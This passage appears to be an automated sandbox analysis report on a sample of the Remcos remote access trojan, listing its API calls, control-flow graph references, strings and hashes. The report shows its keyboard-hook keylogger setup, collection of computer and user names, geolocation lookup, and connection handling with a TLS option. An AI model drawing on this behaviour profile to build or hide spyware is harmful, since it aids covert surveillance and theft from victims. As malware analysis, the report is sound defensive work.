calls 48843->48844 48845 415b98 48844->48845 48846 41beac 28 API calls 48845->48846 48847 415ba1 48846->48847 48848 4170c4 48847->48848 48849 415bc1 GetTickCount 48847->48849 48850 415d6a 48847->48850 48851 401e8d 11 API calls 48848->48851 48852 41bc1f 28 API calls 48849->48852 48850->48848 48914 415d20 48850->48914 48853 4170cd 48851->48853 48854 415bd2 48852->48854 48856 401fd8 11 API calls 48853->48856 48915 41bb77 GetLastInputInfo GetTickCount 48854->48915 48858 4170d9 48856->48858 48860 401fd8 11 API calls 48858->48860 48859 415bde 48861 41bc1f 28 API calls 48859->48861 48862 4170e5 48860->48862 48863 415be9 48861->48863 48864 41bb27 30 API calls 48863->48864 48865 415bf7 48864->48865 48866 41bdaf 28 API calls 48865->48866 48867 415c05 48866->48867 48868 401e65 22 API calls 48867->48868 48869 415c13 48868->48869 48916 402f31 28 API calls 48869->48916 48871 415c21 48917 402ea1 28 API calls 48871->48917 48873 415c30 48874 402f10 28 API calls 48873->48874 48875 415c3f 48874->48875 48918 402ea1 28 API calls 48875->48918 48877 415c4e 48878 402f10 28 API calls 48877->48878 48879 415c5a 48878->48879 48919 402ea1 28 API calls 48879->48919 48881 415c64 48920 404aa1 61 API calls ctype 48881->48920 48883 415c73 48884 401fd8 11 API calls 48883->48884 48885 415c7c 48884->48885 48886 401fd8 11 API calls 48885->48886 48887 415c88 48886->48887 48888 401fd8 11 API calls 48887->48888 48889 415c94 48888->48889 48890 401fd8 11 API calls 48889->48890 48891 415ca0 48890->48891 48892 401fd8 11 API calls 48891->48892 48893 415cac 48892->48893 48894 401fd8 11 API calls 48893->48894 48895 415cb8 48894->48895 48896 401f09 11 API calls 48895->48896 48897 415cc1 48896->48897 48898 401fd8 11 API calls 48897->48898 48899 415cca 48898->48899 48900 401fd8 11 API calls 48899->48900 48901 415cd3 48900->48901 48902 401e65 22 API calls 48901->48902 48903 415cde 48902->48903 48904 43bb2c _strftime 40 API calls 48903->48904 48905 415ceb 48904->48905 48906 415cf0 48905->48906 48907 415d16 
48905->48907 48909 415d09 48906->48909 48910 415cfe 48906->48910 48908 401e65 22 API calls 48907->48908 48908->48914 48911 404f51 105 API calls 48909->48911 48921 404ff4 82 API calls 48910->48921 48913 415d04 48911->48913 48913->48848 48914->48848 48922 4050e4 84 API calls 48914->48922 48915->48859 48916->48871 48917->48873 48918->48877 48919->48881 48920->48883 48921->48913 48922->48913 48924->48077 48925->48104 48926->48103 48927->48092 48928->48096 48929->48102 48932 40f7fd 48930->48932 48931 413584 3 API calls 48931->48932 48932->48931 48933 40f82f 48932->48933 48934 40f8a1 48932->48934 48936 40f891 Sleep 48932->48936 48935 409097 28 API calls 48933->48935 48933->48936 48939 41bcef 28 API calls 48933->48939 48945 401f09 11 API calls 48933->48945 48949 402093 28 API calls 48933->48949 48952 4137aa 14 API calls 48933->48952 48963 40d0d1 112 API calls ___scrt_get_show_window_mode 48933->48963 48964 41384f 14 API calls 48933->48964 48937 409097 28 API calls 48934->48937 48935->48933 48936->48932 48940 40f8ac 48937->48940 48939->48933 48941 41bcef 28 API calls 48940->48941 48942 40f8b8 48941->48942 48965 41384f 14 API calls 48942->48965 48945->48933 48946 40f8cb 48947 401f09 11 API calls 48946->48947 48948 40f8d7 48947->48948 48950 402093 28 API calls 48948->48950 48949->48933 48951 40f8e8 48950->48951 48953 4137aa 14 API calls 48951->48953 48952->48933 48954 40f8fb 48953->48954 48966 41288b TerminateProcess WaitForSingleObject 48954->48966 48956 40f903 ExitProcess 48967 412829 62 API calls 48958->48967 48964->48933 48965->48946 48966->48956 48968 42f97e 48969 42f989 48968->48969 48970 42f99d 48969->48970 48972 432f7f 48969->48972 48973 432f8a 48972->48973 48974 432f8e 48972->48974 48973->48970 48976 440f5d 48974->48976 48977 446206 48976->48977 48978 446213 48977->48978 48979 44621e 48977->48979 48980 4461b8 ___crtLCMapStringA 21 API calls 48978->48980 48981 446226 48979->48981 48987 44622f ___crtLCMapStringA 48979->48987 48986 44621b 48980->48986 48984 446802 
_free 20 API calls 48981->48984 48982 446234 48989 44062d 20 API calls _Atexit 48982->48989 48983 446259 RtlReAllocateHeap 48983->48986 48983->48987 48984->48986 48986->48973 48987->48982 48987->48983 48990 443001 7 API calls 2 library calls 48987->48990 48989->48986 48990->48987 48991 426cdc 48996 426d59 send 48991->48996 48997 41e04e 48998 41e063 ctype ___scrt_get_show_window_mode 48997->48998 49000 432f55 21 API calls 48998->49000 49010 41e266 48998->49010 49004 41e213 ___scrt_get_show_window_mode 49000->49004 49001 41e277 49002 41e21a 49001->49002 49003 432f55 21 API calls 49001->49003 49006 41e2b0 ___scrt_get_show_window_mode 49003->49006 49004->49002 49005 432f55 21 API calls 49004->49005 49008 41e240 ___scrt_get_show_window_mode 49005->49008 49006->49002 49012 4335db 49006->49012 49008->49002 49009 432f55 21 API calls 49008->49009 49009->49010 49010->49002 49011 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49010->49011 49011->49001 49015 4334fa 49012->49015 49014 4335e3 49014->49002 49016 433513 49015->49016 49020 433509 49015->49020 49017 432f55 21 API calls 49016->49017 49016->49020 49018 433534 49017->49018 49018->49020 49021 4338c8 CryptAcquireContextA 49018->49021 49020->49014 49022 4338e4 49021->49022 49023 4338e9 CryptGenRandom 49021->49023 49022->49020 49023->49022 49024 4338fe CryptReleaseContext 49023->49024 49024->49022 49025 426c6d 49031 426d42 recv 49025->49031

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000), ref: 0041CC19
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
• GetProcAddress.KERNEL32(00000000), ref: 0041CC42
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000), ref: 0041CC66
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
• GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                          • API String ID: 4236061018-3687161714
                                          • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                          • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                          • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                          • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000104), ref: 0040EA29
                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                          • String ID: (TG$,aF$,aF$Access Level: $Administrator$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$Exe$Exe$HSG$HSG$Inj$Remcos Agent initialized$Rmc-8AGIM5$Software\$User$del$del$exepath$licence$license_code.txt$pd$tMG$RG$RG$RG$RG$RG
                                          • API String ID: 2830904901-2287637627
                                          • Opcode ID: f976f17ee8bb52e0d4b82a9473b60eebd4c4dbdb3f227a753039268697e419d9
                                          • Instruction ID: 744eeac4272eceb7f63ef51a6efbfa797c3f505d1bd04c543663c5f487e0f2b9
                                          • Opcode Fuzzy Hash: f976f17ee8bb52e0d4b82a9473b60eebd4c4dbdb3f227a753039268697e419d9
                                          • Instruction Fuzzy Hash: 7D32D860B043416BDA14B7729C57B6E26994F80748F40483FB9467F2E3EEBD8D45839E

                                          Control-flow Graph

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                          • GetLastError.KERNEL32 ref: 0040A328
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                          • TranslateMessage.USER32(?), ref: 0040A385
                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                          Strings
                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                          • String ID: Keylogger initialization failure: error
                                          • API String ID: 3219506041-952744263
                                          • Opcode ID: ec6ea0f8fe23a749d8e8acf9f7cc52a99e5dbd3939ef256a600925548c7b7f6b
                                          • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                          • Opcode Fuzzy Hash: ec6ea0f8fe23a749d8e8acf9f7cc52a99e5dbd3939ef256a600925548c7b7f6b
                                          • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                          • ExitProcess.KERNEL32 ref: 0040F905
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                          • String ID: 5.2.0 Pro$override$pth_unenc$RG
                                          • API String ID: 2281282204-1448307011
                                          • Opcode ID: 3c03a218c075b6ec39c216bc398aa57ef6cd9b47273f335186667c9805b65560
                                          • Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
                                          • Opcode Fuzzy Hash: 3c03a218c075b6ec39c216bc398aa57ef6cd9b47273f335186667c9805b65560
                                          • Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF

                                          Control-flow Graph

                                          APIs
                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                          Strings
                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: Internet$CloseHandleOpen$FileRead
                                          • String ID: http://geoplugin.net/json.gp
                                          • API String ID: 3121278467-91888290
                                          • Opcode ID: f8b7b88f44e13cfdc63bd17292d54b3b7b9fb09318b10958e004bbca1d27f117
                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                          • Opcode Fuzzy Hash: f8b7b88f44e13cfdc63bd17292d54b3b7b9fb09318b10958e004bbca1d27f117
                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                          APIs
                                          • GetLocalTime.KERNEL32(00000001,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: Create$EventLocalThreadTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 2532271599-1507639952
                                          • Opcode ID: 066d78ba7818bee30ed95e00d6410b7cbfa006029d83974b6d81b45a693dc474
                                          • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                          • Opcode Fuzzy Hash: 066d78ba7818bee30ed95e00d6410b7cbfa006029d83974b6d81b45a693dc474
                                          • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,006448A8), ref: 004338DA
                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Context$AcquireRandomRelease
                                          • String ID:
                                          • API String ID: 1815803762-0
                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750F4), ref: 0041B6BB
                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser
                                          • String ID:
                                          • API String ID: 4229901323-0
                                          • Opcode ID: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                          • Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
                                          • Opcode Fuzzy Hash: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                          • Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,hd,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 4f66370edde0bdaa3bcc008f8ea5ce22c00289683c96eec7ff0f1ed7c7935faa
                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                          • Opcode Fuzzy Hash: 4f66370edde0bdaa3bcc008f8ea5ce22c00289683c96eec7ff0f1ed7c7935faa
                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                          Control-flow Graph

                                           (graph rendered as an image in the original report; legend: Executed / Not Executed) Function 00414F65, basic blocks 00414F65-00415B20. API calls shown in the graph: Sleep, WSAGetLastError, GetTickCount, CreateThread.
                                          APIs
                                          • Sleep.KERNEL32(00000000,00000029,00475300,004750F4,00000000), ref: 00414FB6
                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$ErrorLastLocalTime
                                          • String ID: | $%I64u$,aF$5.2.0 Pro$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$HSG$Rmc-8AGIM5$TLS Off$TLS On $hlight$hd$name$pd$tMG$RG
                                          • API String ID: 524882891-350667003
